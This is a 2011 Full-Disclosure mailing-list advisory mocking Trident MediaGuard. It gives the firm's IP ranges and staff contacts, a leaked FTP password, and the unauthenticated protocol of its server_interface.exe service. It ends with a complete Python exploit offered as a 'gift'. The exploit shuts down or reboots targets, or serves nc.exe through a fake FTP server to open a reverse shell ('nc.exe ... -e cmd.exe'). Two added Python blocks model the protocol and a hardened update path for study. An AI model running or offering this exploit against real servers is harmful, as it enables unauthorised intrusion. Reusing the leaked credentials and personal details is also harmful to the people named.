# Received: by 10.229.245.65 with HTTP; Fri, 20 May 2011 11:59:38 -0700 (PDT)
# Date: Fri, 20 May 2011 20:59:38 +0200
# Message-ID: <BANLkTi=gXd7qCEGpnjvfOM-_xJRh3TAfwQ AT mail.gmail.com>
# From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg"
#       <cult.of.the.dead.hadopi.tmg AT gmail.com>
# To: full-disclosure AT lists.grok.org.uk
# X-Mailman-Approved-At: Fri, 20 May 2011 20:13:30 +0100
# Subject: [Full-disclosure] Too Many Gremlins for Trident MediaGuard (HADOPI)
# Content-Type: text/plain; charset="iso-8859-1"
# Content-Transfer-Encoding: quoted-printable
# -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --
# --==[ CULT OF THE DEAD HADOPI ]==--
# Advisory 2
#
# The HADOPI law or Creation and Internet law (French: Loi favorisant la
# diffusion et la protection de la création sur Internet, "law
# promoting the distribution and protection of creative works on the
# internet") is a French law introduced during 2009, attempting to
# control and regulate internet access as a means to encourage
# compliance with copyright laws. "HADOPI" is the government agency
# created by the eponymous law.
# http://en.wikipedia.org/wiki/HADOPI_law
#
# In a previous advisory, we exposed the secret plan of the French
# government to take over the Internet using a patriotic botnet. A few
# days after the strategy was exposed, the piece of software was removed
# by Orange. No more Internet by Orange...
#
# Now, the cult of the dead HADOPI is proud to announce its new advisory
# (free copy, quote it as much as you want, no tax to be paid):
#
#                          Too Many Gremlins
#                                for
#                         Trident MediaGuard
#
# After such a big failure at creating a patriotic botnet, the French
# government is trying to build a new army with strong and reliable
# soldiers: Gremlins.
# They subcontracted the job to a private company called Trident MediaGuard.
# This company is as well hidden as Bin Laden in the middle of
# Pakistan. It is the long arm of the HADOPI and the French government
# for everything related to three-strikes laws. Note that they recruit
# people all over Europe at least. Fear the Gremlins.
# But they fucked everything up, like DSK.
#
# Who are they?
#
# Trident Media Guard (TMG) is a French company specialized in software
# to prevent unauthorized copying of files over the Internet. Founded in
# 2002 by Alain Guislain and Bastien Casalta, it is located in
# Saint-Sébastien-sur-Loire near Nantes.
# It aims to "provide services to major publishing companies of the
# recording and film industry to stop the loss of revenue due to illegal
# downloads on peer-to-peer networks."
# http://en.wikipedia.org/wiki/Trident_Media_Guard
# http://www.societe.com/societe/trident-media-guar-sa-441392586.html
#
# You have to read to the end to learn how to pwn the Gremlins!
# Never expose the Mogwai to bright lights *****************
#
# For a few days around the 14th-15th of May 2011, a "test server"
# (according to Too Many Gremlins' spokesman) was exposed on the Internet.
# It was supposed to be used for R&D only.
# This server (91.189.104.82) gave away some files revealing what Too Many
# Gremlins is filtering, and how they are working.
# You can retrieve all the files here: http://pastebin.com/Rc1zGXu0
# They should remember it is better to close the door before going into
# the bathroom. You never know, a maid could come in.
#
# Never trust 91.189.104.0 - 91.189.111.255 -------------------------------
#
# When you look for information about 91.189.104.82, you discover it belongs to:
#
# $ whois 91.189.104.82
# inetnum:        91.189.104.0 - 91.189.111.255
# netname:        FARM04
# descr:          Trident Mediguard
# country:        FR
# org:            ORG-TA253-RIPE
# admin-c:        CB1756-RIPE
# tech-c:         CB1756-RIPE
#
# person:         Casalta Bastien
# address:        Trident Mediguard
#                 13 rue de la Tour d'Auvergne
#                 44200 Nantes
#                 FR
# phone:          +33 2 40 12 00 97
# fax-no:         +33 2 40 35 36 79
# e-mail:         casalta@mediaguard.info
# nic-hdl:        CB1756-RIPE
#
# route:          91.189.104.0/21
# descr:          Trident Mediguard
# origin:         AS174
# mnt-by:         COGENT-ROUTE-MNT
#
# Gremlins, especially French ones, are horny and tend to reproduce very
# quickly. They need at least a /21!
# So, if you don't want gremlins to get you, just ban these IPs. Hmmm,
# maybe they noticed people already do that. So maybe now they are using
# the same trick everyone uses to bypass the three-strikes law: a VPN.
#
# On a side note, quite funny:
#
# $ host mediaguard.info
# mediaguard.info has address 212.53.95.124
# mediaguard.info mail is handled by 10 smtp99.nagra.com.
#
# WTF is MediaGuard doing with Nagra!
# Back to the future -------------------------------
#
# Gremlins can look so nice, so sweet, so kind, especially when they
# promise the government: Sir, yes Sir, all private data will be kept
# secret. We care about privacy, security, we really do, as long as you
# pay us.
# But of course, leaks happen, like in 2007 with MediaDefender (just
# google for "mediadefender email leak").
# There, you could find emails from Bastien Casalta asking MediaDefender
# not to block some IP ranges:
#
# From: Bastien Casalta
# To: Ben Grodsky
# Sent: Thu Aug 30 01:01:56 2007
# Subject: IP Blocks
#
# Hello Ben,
#
# - you can ignore the following ip blocks:
#   82.138.81.0 /24
#   82.138.88.0 /22
#   91.189.104.0 /21
#   130.117.41.0 /24
#   130.117.115.128 /25
#
# Best,
# Bastien
#
# TMG
# 13, rue de la Loire - Bât D
# 44230 St Sébastien Sur Loire
# Tel 02 40 12 00 97
# Fax 02 40 35 36 79
# contact_at_tmg.eu
#
# So the range where the so-called test server 91.189.104.82 leaked
# already belonged to the Gremlins in 2007. Maybe you also want to ban
# the other ranges listed above.
# BTW, if you want to get in touch with Bastien Casalta, use the proper
# email: casalta(at)tmg.eu
#
# Gimme money ------------------------------
#
# French politics can be very perverse (yes, DSK is not the only one). They
# succeed in taking taxes from people and giving them to "innovative"
# companies. In 2005, Too Many Gremlins got 40,000 euros from an official
# agency supposed to help "innovative companies".
# You see, all French are perverse: they pay taxes to get Big Brothered.
# http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897
# Patents ------------------------------
#
# The gremlins are very possessive. As such, they try to protect their
# "precious". And nowadays, you don't have to hide for centuries in a
# cave: you patent your idea!
#
# * http://www.faqs.org/patents/app/20090210492
#   Patent application title: METHOD FOR COMBATTING THE ILLICIT
#   DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING
#   OUT SAID METHOD
#   Inventors: Alain Guislain (St. Sebastien Sur Loire, FR) Bastien
#   Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
#   IPC8 Class: AG06F1516FI
#   USPC Class: 709204
#   Publication date: 08/20/2009
#   Patent application number: 20090210492
#   Abstract:
#     The invention relates to a method for hindering or preventing the
#     illegal distribution of protected data in a peer-to-peer network
#     comprising at least one peer operating an exchange programme
#     designed for distribution of data to at least one client according
#     to a selective exchange protocol permitting the peer to operate a
#     selection of clients to which the data is transferred, said
#     selection being carried out as a function of one or more
#     characteristics of the clients. In said method bogus data is sent
#     to the peer such as to influence the selection of clients served
#     by the peer, such that the peer is made to favour the transfer to
#     authorised clients.
#
# * http://www.faqs.org/patents/app/20100036935
#   Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A
#   FILE IN A P2P NETWORK
#   Inventors: Bastien Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
#   IPC8 Class: AG06F1516FI
#   USPC Class: 709219
#   Publication date: 02/11/2010
#   Patent application number: 20100036935
#   Abstract:
#     A method for establishing connections with a number of peers of a
#     peer to peer network operating using at least one exchange
#     protocol, such as to influence the broadcast of a file within a
#     peer to peer network, the addresses of the number of peers being
#     held by at least one network server. A connection is established
#     with the network server such as to at least partially download the
#     addresses of the number of peers connected to the network and
#     implicated in the downloading of the file, to a control server,
#     then connections are established between at least one control
#     client exchanging data with the control server and peers the
#     addresses of which have been downloaded to the control server,
#     such as to download content from a peer to a controlled client or
#     broadcast content from a controlled client to a peer, the
#     downloading or broadcasting being carried out according to the
#     exchange protocol.
#
# How to contact them -----------------------------
#
# If you want to get in touch with the Gremlins' leaders:
#
# * Alain Guislain, CEO
#   http://fr.linkedin.com/pub/alain-guislain/1/215/952
# * Bastien Casalta, CTO
#   http://www.linkedin.com/profile/view?id=4004355
# * Soufiane Rouibia, R&D manager
#   http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8
#
# Or visit the empty website: http://tmg.eu
# Never get it wet *****************
#
# Ok, ok, it was a bit long. But you have to learn what Gremlins are to
# understand their evil power. Let us have a look now at what was on that
# server.
#
# A list of names --------------------------------
#
# In server_interface.exe, where the Gremlins spread from, you can find
# a list of ... we don't know what yet. You can easily find it everywhere
# on the Internet now. Just look for KingElvis, jay@yahoo.se and
# melon_foli, and you will find the list.
# THE LIST: http://pastebin.com/xBFzK9Ce
# Here, we are very disappointed: we cannot determine what this list
# is for :(
# Are these the names of the Gremlins? Or nicks of the humans they ate?
# No way to know.
#
# Save your FTP password on the server itself ------------------------
#
# No need to comment here...
#
# 91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
# share
# hFd38+1E
# prompt
# pasv
# mget "script/script_diff2/execute_update.bat"
# mget "script/script_diff2/cmd_execute_update_cmd_file.txt"
#
# Oh yes! This is the script file auto_update.bat feeds to "ftp -s:", so
# the first two lines are the FTP user name and password, sent in clear
# text to whatever host the batch file is pointed at.
# Just in case they erase the above file, it is also in
# cmd_update_cmd_file.txt.
# Remember, the Gremlins are supposed to protect your private data.
#
# Never feed it after midnight *****************
#
# Too Many Gremlins is an innovative company. Let us see how innovative
# their way of developing is, and with it the way they protect the private
# data they gather.
# Among the files they shared, one is called server_interface.exe. It is a
# Delphi service (welcome to the 90s) listening on TCP/8500.
#
# Advanced feature: authentication -----------------------------
#
# As they keep stating, Too Many Gremlins is on the cutting edge of
# technology. The patents show how true it is. Sadly, we could not find
# their patent on authentication ... maybe because you do not need to
# authenticate!
# Anyone can connect to this server and send commands. :)
# This is called sharing, isn't it?
# Advanced feature: protocol design ----------------------------
#
# The protocol is very simple:
# - the first four bytes must be \x15\x66\x00\x78
# - the next byte determines the command:
#   - \x65: shutdown the computer
#   - \x66: reboot the computer
#   - \x70: execute stop_P2P_client.bat
#     - the next two bytes are used as the size to get the output of this script
#   - \x71: execute start_P2P_client.bat
#     - the next two bytes are used as the size to get the output of this script
#   - \x81: execute transfer_set.bat
#     - the next double word is the IP address to download files from using FTP
#     - the next word is the port to use
#     - the next two bytes are used as the size to get the output of this script
#   - \x82: execute auto_update.bat
#     - the next double word is the IP address to download files from using FTP
#     - the next word is the port to use
#     - the next two bytes are used as the size to get the output of this script
# The script at the end of this advisory encodes the IP address as
# inet_aton() output and the port in network byte order.
# As an exercise, you can code the proper Scapy classes. Please, drop
# your submissions to http://trac.secdev.org/scapy
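# A builder, parser and mock dispatcher for the control protocol described
# above. This is an added example (Python 3), not the advisory's code and not
# TMG's: the field layout is the one listed above, the IPv4 field and the port
# are encoded the way the exploit script on this page sends them (inet_aton()
# output, port in network byte order), and the byte order of the 2-byte output
# size field is not stated anywhere on the page, so big-endian is an assumption.

```python
"""Codec and mock dispatcher for the server_interface.exe control protocol.

Added example (Python 3), not the advisory's code and not TMG's. Layout follows
the description above: 4 magic bytes, 1 command byte, then per-command fields.
The IPv4 field is encoded like inet_aton() output and the port in network byte
order, as the exploit script on this page sends them; the byte order of the
2-byte "output size" field is not stated on the page and is ASSUMED big-endian.
"""
import ipaddress
import struct

MAGIC = b"\x15\x66\x00\x78"

CMD_HALT = 0x65
CMD_REBOOT = 0x66
CMD_STOP_P2P = 0x70
CMD_START_P2P = 0x71
CMD_TRANSFER = 0x81
CMD_UPDATE = 0x82

# Commands that carry the 2-byte output-size field, and the subset that
# also carries an FTP endpoint (IPv4 dword + port word) before it.
WITH_SIZE = {CMD_STOP_P2P, CMD_START_P2P, CMD_TRANSFER, CMD_UPDATE}
WITH_FTP = {CMD_TRANSFER, CMD_UPDATE}
SCRIPTS = {
    CMD_STOP_P2P: "stop_P2P_client.bat",
    CMD_START_P2P: "start_P2P_client.bat",
    CMD_TRANSFER: "transfer_set.bat",
    CMD_UPDATE: "auto_update.bat",
}


def build(cmd, ftp_host=None, ftp_port=0, out_size=0):
    """Encode one control message as the service reads it on TCP/8500."""
    if cmd not in SCRIPTS and cmd not in (CMD_HALT, CMD_REBOOT):
        raise ValueError("unknown command 0x%02x" % cmd)
    msg = MAGIC + bytes([cmd])
    if cmd in WITH_FTP:
        msg += ipaddress.IPv4Address(ftp_host).packed + struct.pack("!H", ftp_port)
    if cmd in WITH_SIZE:
        msg += struct.pack("!H", out_size)  # assumed big-endian
    return msg


def parse(data):
    """Decode one message into a dict; ValueError on bad magic, unknown
    command or truncated input. Trailing bytes are returned, not dropped."""
    if len(data) < 5 or data[:4] != MAGIC:
        raise ValueError("bad magic")
    cmd = data[4]
    if cmd not in SCRIPTS and cmd not in (CMD_HALT, CMD_REBOOT):
        raise ValueError("unknown command 0x%02x" % cmd)
    fields = {"cmd": cmd}
    pos = 5
    if cmd in WITH_FTP:
        if len(data) < pos + 6:
            raise ValueError("truncated FTP endpoint")
        fields["ftp_host"] = str(ipaddress.IPv4Address(data[pos:pos + 4]))
        fields["ftp_port"] = struct.unpack("!H", data[pos + 4:pos + 6])[0]
        pos += 6
    if cmd in WITH_SIZE:
        if len(data) < pos + 2:
            raise ValueError("truncated output size")
        fields["out_size"] = struct.unpack("!H", data[pos:pos + 2])[0]
        pos += 2
    fields["trailing"] = data[pos:]
    return fields


def dispatch(data):
    """What the unauthenticated service would do with the message, as a
    string. Nothing is executed; this only makes the attack surface visible:
    every caller that knows the 4 magic bytes gets the same treatment."""
    f = parse(data)
    if f["cmd"] == CMD_HALT:
        return "shutdown"
    if f["cmd"] == CMD_REBOOT:
        return "reboot"
    action = "run " + SCRIPTS[f["cmd"]]
    if f["cmd"] in WITH_FTP:
        action += " ftp://%s:%d" % (f["ftp_host"], f["ftp_port"])
    return action


if __name__ == "__main__":
    # Constructed example: the packet the "pwn" mode of the script sends,
    # pointing the update at 192.168.0.1:21 (the script's placeholder IP).
    pkt = build(CMD_UPDATE, "192.168.0.1", 21)
    print(pkt.hex(), "->", dispatch(pkt))
```

# dispatch() is the whole security story in four lines: the only thing a
# request has to get right is the magic, after which the connecting party
# chooses the script and, for \x81/\x82, the FTP server it is fetched from.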
# Advanced feature: pwn the Gremlins --------------------------
#
# Let us have a look at auto_update.bat, used by command \x82:
#
# 91.189.104.82/test/script>> cat auto_update.bat
# @echo off
# echo auto_update.bat
# echo Transfering files from %1:%2, exiting in 10 sec
# if (%1 == "") exit
# echo Update cmd file
# ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1
# execute_update.bat %1 %2
# echo auto_update.bat completed
#
# I think you have spotted the problem :) The FTP host %1 comes straight
# from the \x82 packet, so an attacker can use the "Auto Update" feature
# to force the server to download updates from an evil FTP server he
# controls. Of course, the downloaded file is executed just after the
# download: execute_update.bat is itself one of the two files fetched by
# cmd_auto_update_cmd_file.txt. The empty-argument guard does not help
# either: cmd.exe reads 'if (%1 == "") exit' as a comparison of the
# string (%1 with ""), so it never fires.
# Hence, anyone who wants to raise an army against Too Many Gremlins,
# look for open bar on TCP 8500. Here is the gift to you from the cult
# of the dead HADOPI.
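# The update path as described above, next to what a fixed one would look
# like. This is an added example (Python 3), not TMG's code (their service is
# Delphi) and not the advisory's. Everything in it is constructed for the
# example: the pinned update server UPDATE_HOST:UPDATE_PORT, the bundle
# format (32-byte HMAC-SHA256 tag followed by the payload, keyed with
# UPDATE_KEY), and the fetch/execute callables that stand in for ftp.exe and
# execute_update.bat so the whole thing runs offline.

```python
"""The 0x82 "auto update" path: the flaw as the advisory describes it, next to
a hardened handler.

Added example (Python 3), not TMG's code and not the advisory's. Assumptions,
all constructed for the example: the update source is pinned to
UPDATE_HOST:UPDATE_PORT; an update bundle is a 32-byte HMAC-SHA256 tag
followed by the payload, keyed with UPDATE_KEY; fetching and executing are
injected callables so the example runs offline.
"""
import hashlib
import hmac
import ipaddress
import struct

MAGIC = b"\x15\x66\x00\x78"
CMD_UPDATE = 0x82

UPDATE_HOST, UPDATE_PORT = "203.0.113.10", 21   # assumed pinned update server
UPDATE_KEY = b"constructed-example-key"          # assumed shared key


def parse_update(msg):
    """Endpoint carried by an update command: IPv4 (as inet_aton) + port."""
    if len(msg) < 13 or msg[:5] != MAGIC + bytes([CMD_UPDATE]):
        raise ValueError("not an update command")
    host = str(ipaddress.IPv4Address(msg[5:9]))
    port = struct.unpack("!H", msg[9:11])[0]
    return host, port


def vulnerable_update(msg, fetch, execute):
    """What auto_update.bat does: fetch from whatever %1:%2 the packet says,
    then run what came back. The caller picked the server; nothing is checked."""
    host, port = parse_update(msg)
    return execute(fetch(host, port))


def verify_bundle(bundle):
    """Return the payload if its tag is valid under UPDATE_KEY, else None."""
    if len(bundle) < 32:
        return None
    tag, payload = bundle[:32], bundle[32:]
    expected = hmac.new(UPDATE_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


def hardened_update(msg, fetch, execute):
    """The command is only a trigger: the network-supplied endpoint is parsed
    for logging and then ignored, the bundle comes from the pinned server, and
    it is authenticated before anything is executed."""
    requested = parse_update(msg)
    bundle = fetch(UPDATE_HOST, UPDATE_PORT)
    payload = verify_bundle(bundle)
    if payload is None:
        return "rejected: bundle from %s:%d failed authentication (request asked for %s:%d)" % (
            UPDATE_HOST, UPDATE_PORT, requested[0], requested[1])
    return execute(payload)


def sign_bundle(payload):
    """Producer side: what the real update server would publish."""
    return hmac.new(UPDATE_KEY, payload, hashlib.sha256).digest() + payload


# --- constructed scenario: an attacker points the update at their own FTP ---
def make_fetch(files):
    """Fake FTP: a (host, port) -> bytes table; unknown hosts serve nothing."""
    return lambda host, port: files.get((host, port), b"")


def fake_execute(payload):
    return "executed: " + payload.decode("ascii", "replace")


def attacker_packet(ip, port):
    """The \\x82 packet the exploit sends: magic, command, IPv4, port, size."""
    return (MAGIC + bytes([CMD_UPDATE]) + ipaddress.IPv4Address(ip).packed
            + struct.pack("!H", port) + b"\x00\x00")


if __name__ == "__main__":
    evil = attacker_packet("198.51.100.7", 21)
    files = {
        ("198.51.100.7", 21): b"nc.exe 198.51.100.7 8501 -e cmd.exe",
        (UPDATE_HOST, UPDATE_PORT): sign_bundle(b"legit update"),
    }
    print(vulnerable_update(evil, make_fetch(files), fake_execute))
    print(hardened_update(evil, make_fetch(files), fake_execute))
```

# Two independent changes are doing the work: the endpoint in the packet
# is never used as a download source, and the bundle is checked before it is
# run, so a hijacked route or a spoofed pinned host still gets nothing
# executed. HMAC is used only to keep the example dependency-free; in a real
# deployment a public-key signature (Ed25519, say) is the better fit, since a
# symmetric key stored next to that FTP password would leak the same way.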
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# $> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import sys
import struct
import socket
from threading import Thread

#
# Change this IP to your public IP address.
#
PUBLIC_IP = "192.168.0.1"

#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT = 8500
FTP_PORT = 21
SHELL_PORT = 8501

# Protocol constants (see "protocol design" above)
MAGIC = "\x15\x66\x00\x78"
HALT = "\x65"
REBOOT = "\x66"
STOP = "\x70\x00\x00"          # command byte + 2-byte output size
UPDATE = "\x82"
OK = "\x01"                    # status byte returned by the server


def usage(msg=None):
    if msg:
        print "Error: %s\n" % msg
    print "Usage: %s IP command" % sys.argv[0]
    print
    print "commands:"
    print "- halt    shutdown the server"
    print "- reboot  reboot the server"
    print "- stop    stop P2P clients (eMule and Shareaza)"
    print "- pwn     use a vulnerability in the Auto Update feature to get a remote shell"
    sys.exit(0)


class fake_ftpd(Thread):
    """Minimal active-mode FTP server. It serves the two files that
    cmd_auto_update_cmd_file.txt fetches, replaced by a batch file that
    renames the second file to nc.exe and spawns a reverse shell."""

    def __init__(self):
        Thread.__init__(self)
        self.s = None
        f = open('./nc.exe', 'rb')
        nc = f.read()
        f.close()
        batch = "@echo off\r\n"
        batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
        batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
        self.files = {
            'script/script_diff2/execute_update.bat': batch,
            'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
        }

    def run(self):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.s.bind(("", FTP_PORT))
        self.s.listen(1)
        print "[+] Waiting for FTP connection..."
        conn, addr = self.s.accept()
        print "[!] FTP - %s connected!" % addr[0]
        conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
        username = password = None
        sdata = None
        while True:
            data = conn.recv(1024)
            if not data:
                break
            args = data.rstrip().split(' ')
            if data.startswith('CWD'):
                conn.send('250 CWD command successful.\r\n')
            elif data.startswith('TYPE'):
                conn.send('200 TYPE set.\r\n')
            elif data.startswith('USER'):
                conn.send('331 Password required.\r\n')
                username = args[1]
            elif data.startswith('PASS'):
                conn.send('230 User logged in.\r\n')
                password = args[1]
                # The credentials from cmd_auto_update_cmd_file.txt arrive here
                print "[!] TMG credentials: %s/%s" % (username, password)
            elif data.startswith('PORT'):
                # Active mode: the client tells us where to open the data channel
                arg = args[1].split(',')
                ip = '.'.join(arg[:4])
                port = int(arg[4]) * 256 + int(arg[5])
                sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sdata.connect((ip, port))
                conn.send('200 PORT command successful.\r\n')
            elif data.startswith('RETR'):
                conn.send('150 Opening BINARY mode data connection\r\n')
                buf = self.files.get(args[1], 'file not found\r\n')
                sdata.send(buf)
                sdata.close()
                conn.send('226 Transfer complete\r\n')
                print "[+] File \"%s\" transferred..." % args[1]
            elif data.startswith('NLST'):
                conn.send('150 Here comes the directory listing.\r\n')
                if len(args) == 1:
                    listing = ''
                else:
                    listing = args[1]
                sdata.send(listing + '\r\n')
                sdata.close()
                conn.send('226 Directory send OK.\r\n')
            elif data.startswith('QUIT'):
                conn.send('221 Goodbye.\r\n')
                break
            else:
                conn.send('500 Unknown command.\r\n')
        conn.close()


def do_stuff(host, cmd):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
        s.connect((host, SRV_PORT))
    except Exception, e:
        print "[?] Error: %s" % e
        s.close()
        return

    print "[+] Sending evil packet..."
    if cmd == 'halt':
        s.send(MAGIC + HALT)
        print "[!] Done!"
    elif cmd == 'reboot':
        s.send(MAGIC + REBOOT)
        print "[!] Done!"
    elif cmd == 'stop':
        s.send(MAGIC + STOP)
        data = s.recv(1)
        if data and data[0] == OK:
            print "[!] Done!"
        else:
            print "[!] Error :("
    elif cmd == 'pwn':
        ftpd = fake_ftpd()
        ftpd.daemon = True
        ftpd.start()
        # \x82 + FTP IP (4 bytes, as inet_aton) + FTP port (16-bit, network
        # byte order) + 2-byte output size
        command = socket.inet_aton(PUBLIC_IP) + struct.pack("!H", FTP_PORT) + "\x00\x00"
        s.send(MAGIC + UPDATE + command)
        data = s.recv(1)
        if data and data[0] == OK:
            # The reverse shell from execute_update.bat calls back here
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s2.bind(("", SHELL_PORT))
            s2.listen(1)
            conn, addr = s2.accept()
            print "[!] SHELL - %s connected!" % addr[0]
            print conn.recv(4096)
            while True:
                cmd = raw_input()
                if cmd == "quit" or cmd == "exit":
                    break
                conn.send(cmd + "\r\n")
                conn.settimeout(None)
                data = conn.recv(1024)
                conn.settimeout(1)
                while True:
                    line = ""
                    try:
                        line = conn.recv(1024)
                    except socket.timeout:
                        break
                    if line == "":
                        break
                    data += line
                # Drop the echoed command and the trailing prompt
                tab = data.split("\n")
                print "\n".join(tab[1:-1])
            conn.close()
        else:
            print "[!] Error :("
    s.close()


if __name__ == '__main__':
    if len(sys.argv) < 3:
        usage("Not enough arguments")
    (_, host, cmd) = sys.argv
    if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
        usage('Invalid command ("%s")' % cmd)
    do_stuff(host, cmd)
    sys.exit(0)
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Famous last words *****************
#
# Whether or not this was a test server, it does not matter. It just shows
# how reliable Too Many Gremlins can be.
# The piece of software is as good as Orange's one described in our
# previous advisory. Even a kid could pwn them. Scary.
# The French evil master plan agency HADOPI stated they are going to inspect
# Too Many Gremlins in order to assess whether they are secure now. I hope
# they also have a look at their code. Oh no! They cannot. Reverse
# engineering is mostly illegal in France. So we should just trust the
# Gremlins.
#
# Greets ******
#
# N. Sarkozy, Chinese fellows, C. Albanel, F. Mitterrand, J-L. Warsmann,
# F. Riester, F. Lefebvre, J-L. Masson, J. Myard, M. Thiollière,
# M. Marland-Militello
#
# -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET
# _______________________________________________
# Full-Disclosure - We believe in it.
# Hosted and sponsored by Secunia - http://secunia.com/